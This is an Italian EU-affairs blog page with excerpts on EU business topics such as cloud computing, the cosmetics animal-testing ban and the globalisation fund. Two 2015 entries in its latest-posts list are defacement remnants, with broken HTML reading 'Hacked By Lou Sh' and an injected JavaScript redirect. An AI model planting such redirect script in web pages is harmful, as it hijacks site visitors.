EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Imprese

Imprese


Imprese

it

La Commissione europea ha scelto Roma come sede del nuovo evento, per mostrare come lo spazio e le sue applicazioni possano offrire vantaggi alla vita quotidiana di tutti i cittadini europei.

La possibilità che questo evento concede tanto ai cittadini, quanto agli studenti che si interessano all’astrofisica, è quella di scoprire i principali progetti spaziali che rievocano alla mente grandi nomi, quali Galileo, il programma europeo di navigazione satellitare, o Copernicus, il programma (...)

it

In seguito alla globalizzazione è aumentata per le aziende l'importanza della comunicazione in lingue differenti dalla propria. L'industria della traduzione è quindi un segmento in continua espansione che nel tempo ha determinato la nascita di vere e proprie società o agenzie di traduzione, che offrono gli strumenti necessari per poter operare in maniera competitiva nel contesto internazionale, garantendo una presenza efficace sul mercato globale. Così l'EUATC - European Union of Associations of Translation Companies - ha cominciato ad imporsi sul panorama europeo giocando un ruolo chiave in una serie di iniziative europee.

EUATC è l’organizzazione che coordina le associazioni nazionali delle imprese di traduzione in tutta Europa. Essa lavora e collabora in un’ottica aperta e condivisa, capace di far fronte alle nuove tendenze del settore attraverso uno sguardo attento ai mercati di tutto il mondo. Attraverso l’uso (...)

it

Zaryn Denzel, fondatore di Tuenti, il più grande social network spagnolo; Daniel Ek e Martin Lorentzon, fondatori di Spotify; Niklas Zennström, co-fondatore di Skype.

Questi sono solo alcuni dei nomi di giovani imprenditori del settore tecnologico che hanno fatto nascere e crescere in Europa la loro attività, per poi espanderla a livello globale. Spotify, il servizio di musica streaming online, è oggi in 23 paesi, mentre attraverso Skype passa un terzo delle (...)

it

Da lunedì 11 marzo è scattato in tutti i Paesi dell’Unione Europea il divieto per la produzione e la vendita di prodotti cosmetici testati sugli animali.

È la tappa conclusiva di un iter legislativo durato molti anni. Già nel settembre del 2004, un regolamento proibiva di testare sugli animali i prodotti finiti. Poi nel marzo del 2009 l’ultimatum fissato tramite un regolamento che imponeva di porre fine anche alla sperimentazione del singolo (...)

it

Sostenere le eccellenze del settore primario è una chiave per farci sentire più europei, nello spirito e nelle idee.

Il 2013 è l’Anno europeo dei cittadini ma già in questi primi mesi stanno emergendo con forza temi legati alle problematiche delle imprese in Europa. Solo per citare un esempio che riguarda il nostro Paese, con un progetto chiamato "Sosteniamo le Eccellenze" la banca Cariparma ha stanziato un (...)

it

Che futuro per l’Europa? Quale Europa vogliamo? Cosa può fare Bruxelles per combattere la crisi e dare risposte concrete agli interrogativi sull’economia reale, sul sostegno alle imprese, sull’occupazione? Sono una parte delle domande che saranno al cento del terzo appuntamento dei «Dialoghi con i cittadini», promossi dalla Commissione europea in occasione dell’Anno europeo dei cittadini.

Il prossimo 18 marzo a Roma il vicepresidente della Commissione europea responsabile per l’Impresa e l’imprenditoria, Antonio Tajani, incontrerà giovani, studenti universitari, cittadini e rappresentanti di organizzazioni non governative, associazioni di categoria ed enti locali, per confrontarsi (...)

it

Nel 2013 la Commissione provvederà ad emanare delle proposte per migliorare le leggi esistenti in materia di marketing ingannevole che lede le imprese, le Ong e i liberi professionisti dell’Unione.

Le truffe più frequenti sono quelle che riguardano società che hanno il compito di redigere degli annuari, associazioni che si celano dietro l’invio di moduli per l’aggiornamento gratuito dei dati delle imprese e esigono in seguito canoni annuali. Già a partire dal 2008 e successivamente nel 2011 il (...)

it

Dopo ben sette anni di dibattiti e discussioni si è arrivati ad una conclusione: l’epilogo non è stato però quello che ci si aspettava. Il regolamento che prevedeva un’informativa maggiore e che obbligava a identificare tutto ciò che proveniva da Paesi extraeuropei è stato ritirato. La sfida volta a difendere la qualità e la produzione interna è stata persa e non sono mancate le polemiche.

Nella serata di martedì 23 ottobre, la Commissione europea, nella figura del Commissario al Commercio Karel de Gucht, ha comunicato a sorpresa una decisione che ha colto alla sprovvista l’intera Europa. Il commissario Karel de Gucht ha infatti annunciato di aver abbandonato il progetto e (...)

it

“Sfruttare al meglio il potenziale della nuvola informatica in Europa”. È questo l’obiettivo dell’ultima iniziativa lanciata dalla Commissione europea e che mira alla creazione, entro il 2020, di 2,5 milioni di nuovi posti di lavoro e all’aumento dell’1% annuo del PIL europeo; un incremento, quindi, di circa 160 miliardi di euro.

Cos’è il Cloud Computing?Con l’espressione Cloud Computing, o nuvola informatica, si intende un insieme di tecnologie che permettono di memorizzare dati (file di testo, immagini, video…) e software, grazie all’utilizzo di risorse remote alle quali gli utenti possono accedere, in modo facile e (...)

it

Il Fondo europeo di adeguamento alla globalizzazione (FEG) ogni anno aiuta i lavoratori nella ricerca di un nuovo impiego, sostenendoli nel percorso di riqualificazione in caso di perdita del lavoro. Lo strumento assistenziale ha una dotazione pari a 500 milioni di euro annui, destinati a bilanciare gli effetti derivanti dalle attività della nuova economia.

Il Fondo è legato ai mutamenti strutturali del commercio mondiale e alla crisi economico-finanziaria in corso. Esso è preposto al finanziamento di misure quali l’assistenza nella ricerca di un impiego, l’orientamento professionale, la formazione e riqualificazione su misura, il tutoraggio e la (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France